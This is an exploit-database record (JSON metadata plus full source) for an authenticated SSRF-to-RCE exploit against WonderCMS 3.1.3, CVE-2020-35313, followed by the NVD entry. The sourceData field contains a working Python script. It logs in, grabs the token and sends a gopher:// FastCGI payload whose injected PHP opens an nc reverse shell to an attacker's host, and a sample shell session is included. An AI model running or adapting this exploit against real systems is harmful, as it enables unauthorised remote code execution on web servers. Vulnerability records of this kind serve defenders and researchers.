WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution

2020-12-02T00:00:00

Description

{"id": "EDB-ID:49154", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution", "description": "", "published": "2020-12-02T00:00:00", "modified": "2020-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/49154", "reporter": "zetc0de", "references": [], "cvelist": ["CVE-2020-35313", "2020-35313"], "immutableFields": [], "lastseen": "2022-01-13T05:30:02", "viewCount": 389, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-35313"]}], "rev": 4}, "score": {"value": 6.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-35313"]}]}, "exploitation": null, "vulnersScore": 6.8}, "sourceHref": "https://www.exploit-db.com/download/49154", "sourceData": "# Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution\r\n# Date: 2020-11-27\r\n# Exploit Author: zetc0de\r\n# Vendor Homepage: https://www.wondercms.com/\r\n# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip\r\n# Version: 3.1.3\r\n# Tested on: Ubuntu 16.04\r\n# CVE : CVE-2020-35313\r\n\r\n# WonderCMS is vulnerable to SSRF Vulnerability.\r\n# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.\r\n# The theme/plugin installer not sanitize the destination of github/gitlab url, so attacker can pointing te destinaition to localhost. \r\n# when the attacker can pointing the request to localhost, this lead to SSRF vulnerability. \r\n# the most high impact lead to RCE with gopher scheme and FastCGI running in port 9000\r\n# \r\n# python exploit.py\r\n# [+] Getting Token\r\n# [+] Sending payload\r\n# [+] Get reverse shell\r\n\r\n# nc -lnvp 1234\r\n# Connection from 192.168.43.103:56956\r\n# /bin/sh: 0: can't access tty; job control turned off\r\n# $ whoami\r\n# www-data\r\n# $\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom termcolor import colored\r\nfrom time import sleep\r\n\r\nprint(colored('''\r\n\r\n\\ \\ /_ \\ \\ | _ \\ __| _ \\ __| \\ | __| \r\n \\ \\ \\ /( |. | | |_| / ( |\\/ |\\__ \\ \r\n \\_/\\_/\\___/_|\\_|___/___|_|_\\\\___|_| _|____/ \r\n \r\n------[ SSRF to Remote Code Execution ]------\r\n\t''',\"blue\"))\r\n\r\n\r\nloginURL = \"http://wonder.com/loginURL\"\r\npassword = \"GpIyq0RH\"\r\nlhost = \"192.168.43.66\"\r\nlport = \"1234\"\r\npayload = \"gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500\".format(lhost,lport)\r\n\r\n\r\nr = requests.session()\r\ndata = { \"password\" : password }\r\npage = r.post(loginURL,data)\r\nif \"Wrong\" in page.text:\r\n\tprint(colored(\"[!] Exploit Failed : Wrong Credential\",\"red\"))\r\n\texit()\r\n\r\nprint(colored(\"[+] Getting Token\",\"cyan\"))\r\nsoup = BeautifulSoup(page.text, \"html.parser\")\r\n\r\nallscript = soup.find_all(\"script\")\r\nno = 0\r\nfor i in allscript:\r\n\tif \"rootURL\" in str(i):\r\n\t\turl = i.string.split(\"=\")[1].replace('\"','').strip(\";\").lstrip(\" \")\r\n\telif \"token\" in str(i):\r\n\t\ttoken = i.string.split(\"=\")[1].replace('\"','').strip(\";\").lstrip(\" \")\r\n\r\n\r\ndef sendPayload(req,url,payload,token):\r\n\tgetShell = url + \"?installThemePlugin=\" + payload + \"&type=plugins&token=\" + token\r\n\treq.get(getShell)\r\n\r\nprint(colored(\"[+] Sending payload\",\"cyan\"))\r\nsleep(1)\r\nprint(colored(\"[+] Get reverse shell\",\"cyan\"))\r\nsendPayload(r,url,payload,token)\r\nprint(colored(\"[+] Good bye\",\"cyan\"))", "osvdbidlist": [], "exploitType": "webapps", "verified": false, "_state": {"dependencies": 1645771703}}

{"cve": [{"lastseen": "2022-03-23T17:48:24", "description": "A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to execute arbitrary code via a crafted URL to the theme/plugin installer.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-20T20:15:00", "type": "cve", "title": "CVE-2020-35313", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35313"], "modified": "2021-04-23T21:18:00", "cpe": ["cpe:/a:wondercms:wondercms:3.1.3"], "id": "CVE-2020-35313", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35313", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wondercms:wondercms:3.1.3:*:*:*:*:*:*:*"]}]}

WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution

Description

Related